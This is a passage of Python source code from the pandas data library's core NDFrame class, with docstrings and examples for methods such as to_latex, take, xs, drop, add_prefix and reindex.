[22, 23]]])
Coordinates:
* items (items) object 'A' 'B' 'C' 'D'
* major_axis (major_axis) datetime64[ns] 2013-01-01 2013-01-02 2013-01-03 # noqa
* minor_axis (minor_axis) object 'first' 'second'
Notes
-----
See the `xarray docs <http://xarray.pydata.org/en/stable/>`__
"""
try:
import xarray
except ImportError:
# Give a nice error message
raise ImportError("the xarray library is not installed\n"
"you can install via conda\n"
"conda install xarray\n"
"or via pip\n"
"pip install xarray\n")
if self.ndim == 1:
return xarray.DataArray.from_series(self)
elif self.ndim == 2:
return xarray.Dataset.from_dataframe(self)
# > 2 dims
coords = [(a, self._get_axis(a)) for a in self._AXIS_ORDERS]
return xarray.DataArray(self,
coords=coords,
)
_shared_docs['to_latex'] = r"""
Render an object to a tabular environment table. You can splice
this into a LaTeX document. Requires \\usepackage{booktabs}.
.. versionchanged:: 0.20.2
Added to Series
`to_latex`-specific options:
bold_rows : boolean, default False
Make the row labels bold in the output
column_format : str, default None
The columns format as specified in `LaTeX table format
            <https://en.wikibooks.org/wiki/LaTeX/Tables>`__ e.g. 'rcl' for 3
columns
longtable : boolean, default will be read from the pandas config module
Default: False.
Use a longtable environment instead of tabular. Requires adding
a \\usepackage{longtable} to your LaTeX preamble.
escape : boolean, default will be read from the pandas config module
Default: True.
            When set to False, prevents escaping of latex special
            characters in column names.
encoding : str, default None
A string representing the encoding to use in the output file,
defaults to 'ascii' on Python 2 and 'utf-8' on Python 3.
decimal : string, default '.'
Character recognized as decimal separator, e.g. ',' in Europe.
.. versionadded:: 0.18.0
multicolumn : boolean, default True
Use \multicolumn to enhance MultiIndex columns.
The default will be read from the config module.
.. versionadded:: 0.20.0
multicolumn_format : str, default 'l'
The alignment for multicolumns, similar to `column_format`
The default will be read from the config module.
.. versionadded:: 0.20.0
multirow : boolean, default False
Use \multirow to enhance MultiIndex rows.
Requires adding a \\usepackage{multirow} to your LaTeX preamble.
Will print centered labels (instead of top-aligned)
across the contained rows, separating groups via clines.
The default will be read from the pandas config module.
.. versionadded:: 0.20.0
"""
@Substitution(header='Write out the column names. If a list of strings '
'is given, it is assumed to be aliases for the '
'column names.')
@Appender(_shared_docs['to_latex'] % _shared_doc_kwargs)
def to_latex(self, buf=None, columns=None, col_space=None, header=True,
index=True, na_rep='NaN', formatters=None, float_format=None,
sparsify=None, index_names=True, bold_rows=False,
column_format=None, longtable=None, escape=None,
encoding=None, decimal='.', multicolumn=None,
multicolumn_format=None, multirow=None):
# Get defaults from the pandas config
if self.ndim == 1:
self = self.to_frame()
if longtable is None:
longtable = config.get_option("display.latex.longtable")
if escape is None:
escape = config.get_option("display.latex.escape")
if multicolumn is None:
multicolumn = config.get_option("display.latex.multicolumn")
if multicolumn_format is None:
multicolumn_format = config.get_option(
"display.latex.multicolumn_format")
if multirow is None:
multirow = config.get_option("display.latex.multirow")
formatter = DataFrameFormatter(self, buf=buf, columns=columns,
col_space=col_space, na_rep=na_rep,
header=header, index=index,
formatters=formatters,
float_format=float_format,
bold_rows=bold_rows,
sparsify=sparsify,
index_names=index_names,
escape=escape, decimal=decimal)
formatter.to_latex(column_format=column_format, longtable=longtable,
encoding=encoding, multicolumn=multicolumn,
multicolumn_format=multicolumn_format,
multirow=multirow)
if buf is None:
return formatter.buf.getvalue()
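    # A hedged usage sketch (not part of the original shared docstring): the
    # rendered string can be pasted into a LaTeX document that loads the
    # booktabs package.
    # >>> df = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
    # >>> latex = df.to_latex(index=False)
    # >>> latex.startswith('\\begin{tabular}')
    # True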
# ----------------------------------------------------------------------
# Fancy Indexing
@classmethod
def _create_indexer(cls, name, indexer):
"""Create an indexer like _name in the class."""
if getattr(cls, name, None) is None:
_indexer = functools.partial(indexer, name)
setattr(cls, name, property(_indexer, doc=indexer.__doc__))
def get(self, key, default=None):
"""
Get item from object for given key (DataFrame column, Panel slice,
etc.). Returns default value if not found.
Parameters
----------
key : object
Returns
-------
value : type of items contained in object
"""
try:
return self[key]
except (KeyError, ValueError, IndexError):
return default
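    # A hedged illustration (not part of the original docstring): ``get``
    # mirrors ``dict.get`` for the info axis.
    # >>> df = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
    # >>> df.get('a')
    # 0    1
    # 1    2
    # Name: a, dtype: int64
    # >>> df.get('z', default='missing')
    # 'missing'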
def __getitem__(self, item):
return self._get_item_cache(item)
def _get_item_cache(self, item):
"""Return the cached item, item represents a label indexer."""
cache = self._item_cache
res = cache.get(item)
if res is None:
values = self._data.get(item)
res = self._box_item_values(item, values)
cache[item] = res
res._set_as_cached(item, self)
# for a chain
res._is_copy = self._is_copy
return res
def _set_as_cached(self, item, cacher):
"""Set the _cacher attribute on the calling object with a weakref to
cacher.
"""
self._cacher = (item, weakref.ref(cacher))
def _reset_cacher(self):
"""Reset the cacher."""
if hasattr(self, '_cacher'):
del self._cacher
def _iget_item_cache(self, item):
"""Return the cached item, item represents a positional indexer."""
ax = self._info_axis
if ax.is_unique:
lower = self._get_item_cache(ax[item])
else:
lower = self._take(item, axis=self._info_axis_number,
convert=True)
return lower
def _box_item_values(self, key, values):
raise com.AbstractMethodError(self)
def _maybe_cache_changed(self, item, value):
"""The object has called back to us saying maybe it has changed.
"""
self._data.set(item, value, check=False)
@property
def _is_cached(self):
"""Return boolean indicating if self is cached or not."""
return getattr(self, '_cacher', None) is not None
def _get_cacher(self):
"""return my cacher or None"""
cacher = getattr(self, '_cacher', None)
if cacher is not None:
cacher = cacher[1]()
return cacher
@property
def _is_view(self):
"""Return boolean indicating if self is view of another array """
return self._data.is_view
def _maybe_update_cacher(self, clear=False, verify_is_copy=True):
"""
See if we need to update our parent cacher if clear, then clear our
cache.
Parameters
----------
clear : boolean, default False
clear the item cache
verify_is_copy : boolean, default True
provide is_copy checks
"""
cacher = getattr(self, '_cacher', None)
if cacher is not None:
ref = cacher[1]()
            # we are trying to reference a dead referent, hence
# a copy
if ref is None:
del self._cacher
else:
try:
ref._maybe_cache_changed(cacher[0], self)
except Exception:
pass
if verify_is_copy:
self._check_setitem_copy(stacklevel=5, t='referant')
if clear:
self._clear_item_cache()
def _clear_item_cache(self, i=None):
if i is not None:
self._item_cache.pop(i, None)
else:
self._item_cache.clear()
def _slice(self, slobj, axis=0, kind=None):
"""
Construct a slice of this container.
kind parameter is maintained for compatibility with Series slicing.
"""
axis = self._get_block_manager_axis(axis)
result = self._constructor(self._data.get_slice(slobj, axis=axis))
result = result.__finalize__(self)
# this could be a view
# but only in a single-dtyped view slicable case
is_copy = axis != 0 or result._is_view
result._set_is_copy(self, copy=is_copy)
return result
def _set_item(self, key, value):
self._data.set(key, value)
self._clear_item_cache()
def _set_is_copy(self, ref=None, copy=True):
if not copy:
self._is_copy = None
else:
if ref is not None:
self._is_copy = weakref.ref(ref)
else:
self._is_copy = None
def _check_is_chained_assignment_possible(self):
"""
Check if we are a view, have a cacher, and are of mixed type.
If so, then force a setitem_copy check.
        Should be called just prior to setting a value.
        Will return a boolean if we are a view and are cached, but a
single-dtype meaning that the cacher should be updated following
setting.
"""
if self._is_view and self._is_cached:
ref = self._get_cacher()
if ref is not None and ref._is_mixed_type:
self._check_setitem_copy(stacklevel=4, t='referant',
force=True)
return True
elif self._is_copy:
self._check_setitem_copy(stacklevel=4, t='referant')
return False
def _check_setitem_copy(self, stacklevel=4, t='setting', force=False):
"""
Parameters
----------
stacklevel : integer, default 4
            the level of the stack to show when the error is output
t : string, the type of setting error
force : boolean, default False
if True, then force showing an error
        Validate if we are doing a setitem on a chained copy.
If you call this function, be sure to set the stacklevel such that the
user will see the error *at the level of setting*
It is technically possible to figure out that we are setting on
a copy even WITH a multi-dtyped pandas object. In other words, some
        blocks may be views while others are not. Currently _is_view will ALWAYS
return False for multi-blocks to avoid having to handle this case.
df = DataFrame(np.arange(0,9), columns=['count'])
df['group'] = 'b'
        # This technically need not raise SettingWithCopy if both are views
        # (which is not generally guaranteed, but is usually True). However,
        # this is in general not a good practice and we recommend using .loc.
df.iloc[0:5]['group'] = 'a'
"""
if force or self._is_copy:
value = config.get_option('mode.chained_assignment')
if value is None:
return
# see if the copy is not actually referred; if so, then dissolve
# the copy weakref
try:
gc.collect(2)
if not gc.get_referents(self._is_copy()):
self._is_copy = None
return
except Exception:
pass
# we might be a false positive
try:
if self._is_copy().shape == self.shape:
self._is_copy = None
return
except Exception:
pass
# a custom message
if isinstance(self._is_copy, string_types):
t = self._is_copy
elif t == 'referant':
t = ("\n"
"A value is trying to be set on a copy of a slice from a "
"DataFrame\n\n"
"See the caveats in the documentation: "
"http://pandas.pydata.org/pandas-docs/stable/"
"indexing.html#indexing-view-versus-copy"
)
else:
t = ("\n"
"A value is trying to be set on a copy of a slice from a "
"DataFrame.\n"
"Try using .loc[row_indexer,col_indexer] = value "
"instead\n\nSee the caveats in the documentation: "
"http://pandas.pydata.org/pandas-docs/stable/"
"indexing.html#indexing-view-versus-copy"
)
if value == 'raise':
raise com.SettingWithCopyError(t)
elif value == 'warn':
warnings.warn(t, com.SettingWithCopyWarning,
stacklevel=stacklevel)
def __delitem__(self, key):
"""
Delete item
"""
deleted = False
maybe_shortcut = False
if hasattr(self, 'columns') and isinstance(self.columns, MultiIndex):
try:
maybe_shortcut = key not in self.columns._engine
except TypeError:
pass
if maybe_shortcut:
# Allow shorthand to delete all columns whose first len(key)
# elements match key:
if not isinstance(key, tuple):
key = (key, )
for col in self.columns:
if isinstance(col, tuple) and col[:len(key)] == key:
del self[col]
deleted = True
if not deleted:
# If the above loop ran and didn't delete anything because
# there was no match, this call should raise the appropriate
# exception:
self._data.delete(key)
# delete from the caches
try:
del self._item_cache[key]
except KeyError:
pass
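    # A hedged illustration (not part of the original source): with MultiIndex
    # columns, ``del`` accepts a partial key and removes every column whose
    # leading elements match it.
    # >>> df = pd.DataFrame(np.ones((2, 3)),
    # ...                   columns=pd.MultiIndex.from_tuples(
    # ...                       [('a', 1), ('a', 2), ('b', 1)]))
    # >>> del df['a']          # drops both ('a', 1) and ('a', 2)
    # >>> list(df.columns)
    # [('b', 1)]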
_shared_docs['_take'] = """
Return the elements in the given *positional* indices along an axis.
This means that we are not indexing according to actual values in
the index attribute of the object. We are indexing according to the
actual position of the element in the object.
This is the internal version of ``.take()`` and will contain a wider
selection of parameters useful for internal use but not as suitable
for public usage.
Parameters
----------
indices : array-like
An array of ints indicating which positions to take.
axis : int, default 0
The axis on which to select elements. "0" means that we are
selecting rows, "1" means that we are selecting columns, etc.
convert : bool, default True
Whether to convert negative indices into positive ones.
For example, ``-1`` would map to the ``len(axis) - 1``.
The conversions are similar to the behavior of indexing a
regular Python list.
is_copy : bool, default True
Whether to return a copy of the original object or not.
Returns
-------
taken : type of caller
An array-like containing the elements taken from the object.
See Also
--------
numpy.ndarray.take
numpy.take
"""
@Appender(_shared_docs['_take'])
def _take(self, indices, axis=0, convert=True, is_copy=True):
self._consolidate_inplace()
if convert:
indices = maybe_convert_indices(indices, len(self._get_axis(axis)))
new_data = self._data.take(indices,
axis=self._get_block_manager_axis(axis),
verify=True)
result = self._constructor(new_data).__finalize__(self)
# Maybe set copy if we didn't actually change the index.
if is_copy:
if not result._get_axis(axis).equals(self._get_axis(axis)):
result._set_is_copy(self)
return result
_shared_docs['take'] = """
Return the elements in the given *positional* indices along an axis.
This means that we are not indexing according to actual values in
the index attribute of the object. We are indexing according to the
actual position of the element in the object.
Parameters
----------
indices : array-like
An array of ints indicating which positions to take.
axis : {0 or 'index', 1 or 'columns', None}, default 0
The axis on which to select elements. ``0`` means that we are
selecting rows, ``1`` means that we are selecting columns.
convert : bool, default True
Whether to convert negative indices into positive ones.
For example, ``-1`` would map to the ``len(axis) - 1``.
The conversions are similar to the behavior of indexing a
regular Python list.
.. deprecated:: 0.21.0
In the future, negative indices will always be converted.
is_copy : bool, default True
Whether to return a copy of the original object or not.
**kwargs
For compatibility with :meth:`numpy.take`. Has no effect on the
output.
Returns
-------
taken : type of caller
An array-like containing the elements taken from the object.
See Also
--------
DataFrame.loc : Select a subset of a DataFrame by labels.
DataFrame.iloc : Select a subset of a DataFrame by positions.
numpy.take : Take elements from an array along an axis.
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=['name', 'class', 'max_speed'],
... index=[0, 2, 3, 1])
>>> df
name class max_speed
0 falcon bird 389.0
2 parrot bird 24.0
3 lion mammal 80.5
1 monkey mammal NaN
Take elements at positions 0 and 3 along the axis 0 (default).
Note how the actual indices selected (0 and 1) do not correspond to
our selected indices 0 and 3. That's because we are selecting the 0th
and 3rd rows, not rows whose indices equal 0 and 3.
>>> df.take([0, 3])
name class max_speed
0 falcon bird 389.0
1 monkey mammal NaN
Take elements at indices 1 and 2 along the axis 1 (column selection).
>>> df.take([1, 2], axis=1)
class max_speed
0 bird 389.0
2 bird 24.0
3 mammal 80.5
1 mammal NaN
We may take elements using negative integers for positive indices,
starting from the end of the object, just like with Python lists.
>>> df.take([-1, -2])
name class max_speed
1 monkey mammal NaN
3 lion mammal 80.5
"""
@Appender(_shared_docs['take'])
def take(self, indices, axis=0, convert=None, is_copy=True, **kwargs):
if convert is not None:
msg = ("The 'convert' parameter is deprecated "
"and will be removed in a future version.")
warnings.warn(msg, FutureWarning, stacklevel=2)
else:
convert = True
convert = nv.validate_take(tuple(), kwargs)
return self._take(indices, axis=axis, convert=convert, is_copy=is_copy)
def xs(self, key, axis=0, level=None, drop_level=True):
"""
Returns a cross-section (row(s) or column(s)) from the
Series/DataFrame. Defaults to cross-section on the rows (axis=0).
Parameters
----------
key : object
Some label contained in the index, or partially in a MultiIndex
axis : int, default 0
Axis to retrieve cross-section on
level : object, defaults to first n levels (n=1 or len(key))
In case of a key partially contained in a MultiIndex, indicate
which levels are used. Levels can be referred by label or position.
drop_level : boolean, default True
If False, returns object with same levels as self.
Examples
--------
>>> df
A B C
a 4 5 2
b 4 0 9
c 9 7 3
>>> df.xs('a')
A 4
B 5
C 2
Name: a
>>> df.xs('C', axis=1)
a 2
b 9
c 3
Name: C
>>> df
A B C D
first second third
bar one 1 4 1 8 9
two 1 7 5 5 0
baz one 1 6 6 8 0
three 2 5 3 5 3
>>> df.xs(('baz', 'three'))
A B C D
third
2 5 3 5 3
>>> df.xs('one', level=1)
A B C D
first third
bar 1 4 1 8 9
baz 1 6 6 8 0
>>> df.xs(('baz', 2), level=[0, 'third'])
A B C D
second
three 5 3 5 3
Returns
-------
xs : Series or DataFrame
Notes
-----
xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels. It is a superset of xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
axis = self._get_axis_number(axis)
labels = self._get_axis(axis)
if level is not None:
loc, new_ax = labels.get_loc_level(key, level=level,
drop_level=drop_level)
# create the tuple of the indexer
indexer = [slice(None)] * self.ndim
indexer[axis] = loc
indexer = tuple(indexer)
result = self.iloc[indexer]
setattr(result, result._get_axis_name(axis), new_ax)
return result
if axis == 1:
return self[key]
self._consolidate_inplace()
index = self.index
if isinstance(index, MultiIndex):
loc, new_index = self.index.get_loc_level(key,
drop_level=drop_level)
else:
loc = self.index.get_loc(key)
if isinstance(loc, np.ndarray):
if loc.dtype == np.bool_:
inds, = loc.nonzero()
return self._take(inds, axis=axis, convert=False)
else:
return self._take(loc, axis=axis, convert=True)
if not is_scalar(loc):
new_index = self.index[loc]
if is_scalar(loc):
new_values = self._data.fast_xs(loc)
# may need to box a datelike-scalar
#
# if we encounter an array-like and we only have 1 dim
            # that means that there are lists/ndarrays inside the Series!
# so just return them (GH 6394)
if not is_list_like(new_values) or self.ndim == 1:
return com._maybe_box_datetimelike(new_values)
result = self._constructor_sliced(
new_values, index=self.columns,
name=self.index[loc], dtype=new_values.dtype)
else:
result = self.iloc[loc]
result.index = new_index
# this could be a view
# but only in a single-dtyped view slicable case
result._set_is_copy(self, copy=not result._is_view)
return result
_xs = xs
def select(self, crit, axis=0):
"""Return data corresponding to axis labels matching criteria
.. deprecated:: 0.21.0
Use df.loc[df.index.map(crit)] to select via labels
Parameters
----------
crit : function
To be called on each index (label). Should return True or False
axis : int
Returns
-------
selection : type of caller
"""
warnings.warn("'select' is deprecated and will be removed in a "
"future release. You can use "
".loc[labels.map(crit)] as a replacement",
FutureWarning, stacklevel=2)
axis = self._get_axis_number(axis)
axis_name = self._get_axis_name(axis)
axis_values = self._get_axis(axis)
if len(axis_values) > 0:
new_axis = axis_values[
np.asarray([bool(crit(label)) for label in axis_values])]
else:
new_axis = axis_values
return self.reindex(**{axis_name: new_axis})
def reindex_like(self, other, method=None, copy=True, limit=None,
tolerance=None):
"""Return an object with matching indices to myself.
Parameters
----------
other : Object
method : string or None
copy : boolean, default True
limit : int, default None
Maximum number of consecutive labels to fill for inexact matches.
tolerance : optional
Maximum distance between labels of the other object and this
object for inexact matches. Can be list-like.
.. versionadded:: 0.21.0 (list-like tolerance)
Notes
-----
Like calling s.reindex(index=other.index, columns=other.columns,
method=...)
Returns
-------
reindexed : same as input
"""
d = other._construct_axes_dict(axes=self._AXIS_ORDERS, method=method,
copy=copy, limit=limit,
tolerance=tolerance)
return self.reindex(**d)
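    # A hedged illustration (not part of the original docstring): the other
    # object's index (and columns) are imposed on the caller, introducing NaN
    # where no value exists.
    # >>> df1 = pd.DataFrame({'a': [1.0, 2.0, 3.0]}, index=['x', 'y', 'z'])
    # >>> df2 = pd.DataFrame({'a': [10.0, 20.0]}, index=['z', 'w'])
    # >>> df2.reindex_like(df1)
    #       a
    # x   NaN
    # y   NaN
    # z  10.0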
def drop(self, labels=None, axis=0, index=None, columns=None, level=None,
inplace=False, errors='raise'):
inplace = validate_bool_kwarg(inplace, 'inplace')
if labels is not None:
if index is not None or columns is not None:
raise ValueError("Cannot specify both 'labels' and "
"'index'/'columns'")
axis_name = self._get_axis_name(axis)
axes = {axis_name: labels}
elif index is not None or columns is not None:
axes, _ = self._construct_axes_from_arguments((index, columns), {})
else:
raise ValueError("Need to specify at least one of 'labels', "
"'index' or 'columns'")
obj = self
for axis, labels in axes.items():
if labels is not None:
obj = obj._drop_axis(labels, axis, level=level, errors=errors)
if inplace:
self._update_inplace(obj)
else:
return obj
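    # A hedged illustration (not part of the original source): ``labels`` plus
    # ``axis``, and the ``index``/``columns`` keywords, are two equivalent
    # spellings that cannot be mixed in one call.
    # >>> df = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
    # >>> df.drop('a', axis=1).equals(df.drop(columns='a'))
    # True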
def _drop_axis(self, labels, axis, level=None, errors='raise'):
"""
Drop labels from specified axis. Used in the ``drop`` method
internally.
Parameters
----------
labels : single label or list-like
axis : int or axis name
level : int or level name, default None
For MultiIndex
errors : {'ignore', 'raise'}, default 'raise'
If 'ignore', suppress error and existing labels are dropped.
"""
axis = self._get_axis_number(axis)
axis_name = self._get_axis_name(axis)
axis, axis_ = self._get_axis(axis), axis
if axis.is_unique:
if level is not None:
if not isinstance(axis, MultiIndex):
raise AssertionError('axis must be a MultiIndex')
new_axis = axis.drop(labels, level=level, errors=errors)
else:
new_axis = axis.drop(labels, errors=errors)
dropped = self.reindex(**{axis_name: new_axis})
try:
dropped.axes[axis_].set_names(axis.names, inplace=True)
except AttributeError:
pass
result = dropped
else:
labels = _ensure_object(com._index_labels_to_array(labels))
if level is not None:
if not isinstance(axis, MultiIndex):
raise AssertionError('axis must be a MultiIndex')
indexer = ~axis.get_level_values(level).isin(labels)
else:
indexer = ~axis.isin(labels)
if errors == 'raise' and indexer.all():
raise KeyError('{} not found in axis'.format(labels))
slicer = [slice(None)] * self.ndim
slicer[self._get_axis_number(axis_name)] = indexer
result = self.loc[tuple(slicer)]
return result
def _update_inplace(self, result, verify_is_copy=True):
"""
Replace self internals with result.
Parameters
----------
verify_is_copy : boolean, default True
provide is_copy checks
"""
# NOTE: This does *not* call __finalize__ and that's an explicit
# decision that we may revisit in the future.
self._reset_cache()
self._clear_item_cache()
self._data = getattr(result, '_data', result)
self._maybe_update_cacher(verify_is_copy=verify_is_copy)
def add_prefix(self, prefix):
"""
Prefix labels with string `prefix`.
For Series, the row labels are prefixed.
For DataFrame, the column labels are prefixed.
Parameters
----------
prefix : str
The string to add before each label.
Returns
-------
Series or DataFrame
New Series or DataFrame with updated labels.
See Also
--------
Series.add_suffix: Suffix row labels with string `suffix`.
DataFrame.add_suffix: Suffix column labels with string `suffix`.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.add_prefix('item_')
item_0 1
item_1 2
item_2 3
item_3 4
dtype: int64
>>> df = pd.DataFrame({'A': [1, 2, 3, 4], 'B': [3, 4, 5, 6]})
>>> df
A B
0 1 3
1 2 4
2 3 5
3 4 6
>>> df.add_prefix('col_')
col_A col_B
0 1 3
1 2 4
2 3 5
3 4 6
"""
new_data = self._data.add_prefix(prefix)
return self._constructor(new_data).__finalize__(self)
def add_suffix(self, suffix):
"""
Suffix labels with string `suffix`.
For Series, the row labels are suffixed.
For DataFrame, the column labels are suffixed.
Parameters
----------
suffix : str
The string to add after each label.
Returns
-------
Series or DataFrame
New Series or DataFrame with updated labels.
See Also
--------
Series.add_prefix: Prefix row labels with string `prefix`.
DataFrame.add_prefix: Prefix column labels with string `prefix`.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.add_suffix('_item')
0_item 1
1_item 2
2_item 3
3_item 4
dtype: int64
>>> df = pd.DataFrame({'A': [1, 2, 3, 4], 'B': [3, 4, 5, 6]})
>>> df
A B
0 1 3
1 2 4
2 3 5
3 4 6
>>> df.add_suffix('_col')
A_col B_col
0 1 3
1 2 4
2 3 5
3 4 6
"""
new_data = self._data.add_suffix(suffix)
return self._constructor(new_data).__finalize__(self)
_shared_docs['sort_values'] = """
Sort by the values along either axis
Parameters
----------%(optional_by)s
axis : %(axes_single_arg)s, default 0
Axis to be sorted
ascending : bool or list of bool, default True
Sort ascending vs. descending. Specify list for multiple sort
orders. If this is a list of bools, must match the length of
the by.
inplace : bool, default False
if True, perform operation in-place
kind : {'quicksort', 'mergesort', 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See also ndarray.np.sort for more
information. `mergesort` is the only stable algorithm. For
DataFrames, this option is only applied when sorting on a single
column or label.
na_position : {'first', 'last'}, default 'last'
`first` puts NaNs at the beginning, `last` puts NaNs at the end
Returns
-------
sorted_obj : %(klass)s
Examples
--------
>>> df = pd.DataFrame({
... 'col1' : ['A', 'A', 'B', np.nan, 'D', 'C'],
... 'col2' : [2, 1, 9, 8, 7, 4],
... 'col3': [0, 1, 9, 4, 2, 3],
... })
>>> df
col1 col2 col3
0 A 2 0
1 A 1 1
2 B 9 9
3 NaN 8 4
4 D 7 2
5 C 4 3
Sort by col1
>>> df.sort_values(by=['col1'])
col1 col2 col3
0 A 2 0
1 A 1 1
2 B 9 9
5 C 4 3
4 D 7 2
3 NaN 8 4
Sort by multiple columns
>>> df.sort_values(by=['col1', 'col2'])
col1 col2 col3
1 A 1 1
0 A 2 0
2 B 9 9
5 C 4 3
4 D 7 2
3 NaN 8 4
Sort Descending
>>> df.sort_values(by='col1', ascending=False)
col1 col2 col3
4 D 7 2
5 C 4 3
2 B 9 9
0 A 2 0
1 A 1 1
3 NaN 8 4
Putting NAs first
>>> df.sort_values(by='col1', ascending=False, na_position='first')
col1 col2 col3
3 NaN 8 4
4 D 7 2
5 C 4 3
2 B 9 9
0 A 2 0
1 A 1 1
"""
def sort_values(self, by=None, axis=0, ascending=True, inplace=False,
kind='quicksort', na_position='last'):
"""
NOT IMPLEMENTED: do not call this method, as sorting values is not
supported for Panel objects and will raise an error.
"""
raise NotImplementedError("sort_values has not been implemented "
"on Panel or Panel4D objects.")
_shared_docs['sort_index'] = """
Sort object by labels (along an axis)
Parameters
----------
axis : %(axes)s to direct sorting
level : int or level name or list of ints or list of level names
if not None, sort on values in specified index level(s)
ascending : boolean, default True
Sort ascending vs. descending
inplace : bool, default False
if True, perform operation in-place
kind : {'quicksort', 'mergesort', 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See also ndarray.np.sort for more
information. `mergesort` is the only stable algorithm. For
DataFrames, this option is only applied when sorting on a single
column or label.
na_position : {'first', 'last'}, default 'last'
`first` puts NaNs at the beginning, `last` puts NaNs at the end.
Not implemented for MultiIndex.
sort_remaining : bool, default True
if true and sorting by level and index is multilevel, sort by other
levels too (in order) after sorting by specified level
Returns
-------
sorted_obj : %(klass)s
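Examples
--------
A minimal illustration (illustrative only, not from the upstream text;
the small Series below is assumed):
>>> s = pd.Series([1, 2, 3], index=['b', 'c', 'a'])
>>> s.sort_index()
a    3
b    1
c    2
dtype: int64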
"""
@Appender(_shared_docs['sort_index'] % dict(axes="axes", klass="NDFrame"))
def sort_index(self, axis=0, level=None, ascending=True, inplace=False,
kind='quicksort', na_position='last', sort_remaining=True):
inplace = validate_bool_kwarg(inplace, 'inplace')
axis = self._get_axis_number(axis)
axis_name = self._get_axis_name(axis)
labels = self._get_axis(axis)
if level is not None:
raise NotImplementedError("level is not implemented")
if inplace:
raise NotImplementedError("inplace is not implemented")
sort_index = labels.argsort()
if not ascending:
sort_index = sort_index[::-1]
new_axis = labels.take(sort_index)
return self.reindex(**{axis_name: new_axis})
_shared_docs['reindex'] = """
Conform %(klass)s to new index with optional filling logic, placing
NA/NaN in locations having no value in the previous index. A new object
is produced unless the new index is equivalent to the current one and
copy=False
Parameters
----------
%(optional_labels)s
%(axes)s : array-like, optional (should be specified using keywords)
New labels / index to conform to. Preferably an Index object to
avoid duplicating data
%(optional_axis)s
method : {None, 'backfill'/'bfill', 'pad'/'ffill', 'nearest'}, optional
method to use for filling holes in reindexed DataFrame.
Please note: this is only applicable to DataFrames/Series with a
monotonically increasing/decreasing index.
* default: don't fill gaps
* pad / ffill: propagate last valid observation forward to next
valid
* backfill / bfill: use next valid observation to fill gap
* nearest: use nearest valid observations to fill gap
copy : boolean, default True
Return a new object, even if the passed indexes are the same
level : int or name
Broadcast across a level, matching Index values on the
passed MultiIndex level
fill_value : scalar, default np.NaN
Value to use for missing values. Defaults to NaN, but can be any
"compatible" value
limit : int, default None
Maximum number of consecutive elements to forward or backward fill
tolerance : optional
Maximum distance between original and new labels for inexact
matches. The values of the index at the matching locations must
satisfy the equation ``abs(index[indexer] - target) <= tolerance``.
Tolerance may be a scalar value, which applies the same tolerance
to all values, or list-like, which applies variable tolerance per
element. List-like includes list, tuple, array, Series, and must be
the same size as the index and its dtype must exactly match the
index's type.
.. versionadded:: 0.21.0 (list-like tolerance)
Examples
--------
``DataFrame.reindex`` supports two calling conventions
* ``(index=index_labels, columns=column_labels, ...)``
* ``(labels, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
Create a dataframe with some fictional data.
>>> index = ['Firefox', 'Chrome', 'Safari', 'IE10', 'Konqueror']
>>> df = pd.DataFrame({
... 'http_status': [200,200,404,404,301],
... 'response_time': [0.04, 0.02, 0.07, 0.08, 1.0]},
... index=index)
>>> df
http_status response_time
Firefox 200 0.04
Chrome 200 0.02
Safari 404 0.07
IE10 404 0.08
Konqueror 301 1.00
Create a new index and reindex the dataframe. By default
values in the new index that do not have corresponding
records in the dataframe are assigned ``NaN``.
>>> new_index= ['Safari', 'Iceweasel', 'Comodo Dragon', 'IE10',
... 'Chrome']
>>> df.reindex(new_index)
http_status response_time
Safari 404.0 0.07
Iceweasel NaN NaN
Comodo Dragon NaN NaN
IE10 404.0 0.08
Chrome 200.0 0.02
We can fill in the missing values by passing a value to
the keyword ``fill_value``. Because the index is not monotonically
increasing or decreasing, we cannot use arguments to the keyword
``method`` to fill the ``NaN`` values.
>>> df.reindex(new_index, fill_value=0)
http_status response_time
Safari 404 0.07
Iceweasel 0 0.00
Comodo Dragon 0 0.00
IE10 404 0.08
Chrome 200 0.02
>>> df.reindex(new_index, fill_value='missing')
http_status response_time
Safari 404 0.07
Iceweasel missing missing
Comodo Dragon missing missing
IE10 404 0.08
Chrome 200 0.02
We can also reindex the columns.
>>> df.reindex(columns=['http_status', 'user_agent'])
http_status user_agent
Firefox 200 NaN
Chrome 200 NaN
Safari 404 NaN
IE10 404 NaN
Konqueror 301 NaN
Or we can use "axis-style" keyword arguments
>>> df.reindex(['http_status', 'user_agent'], axis="columns")
http_status user_agent
Firefox 200 NaN
Chrome 200 NaN
Safari 404 NaN
IE10 404 NaN
Konqueror 301 NaN
To further illustrate the filling functionality in
``reindex``, we will create a dataframe with a
monotonically increasing index (for example, a sequence
of dates).
>>> date_index = pd.date_range('1/1/2010', periods=6, freq='D')
>>> df2 = pd.DataFrame({"prices": [100, 101, np.nan, 100, 89, 88]},
... index=date_index)
>>> df2
prices
2010-01-01 100
2010-01-02 101
2010-01-03 NaN
2010-01-04 100
2010-01-05 89
2010-01-06 88
Suppose we decide to expand the dataframe to cover a wider
date range.
>>> date_index2 = pd.date_range('12/29/2009', periods=10, freq='D')
>>> df2.reindex(date_index2)
prices
2009-12-29 NaN
2009-12-30 NaN
2009-12-31 NaN
2010-01-01 100
2010-01-02 101
2010-01-03 NaN
2010-01-04 100
2010-01-05 89
2010-01-06 88
2010-01-07 NaN
The index entries that did not have a value in the original data frame
(for example, '2009-12-29') are by default filled with ``NaN``.
If desired, we can fill in the missing values using one of several
options.
For example, to propagate the next valid value backward to fill the ``NaN``
values, pass ``bfill`` as an argument to the ``method`` keyword.
>>> df2.reindex(date_index2, method='bfill')
prices
2009-12-29 100
2009-12-30 100
2009-12-31 100
2010-01-01 100
2010-01-02 101
2010-01-03 NaN
2010-01-04 100
2010-01-05 89
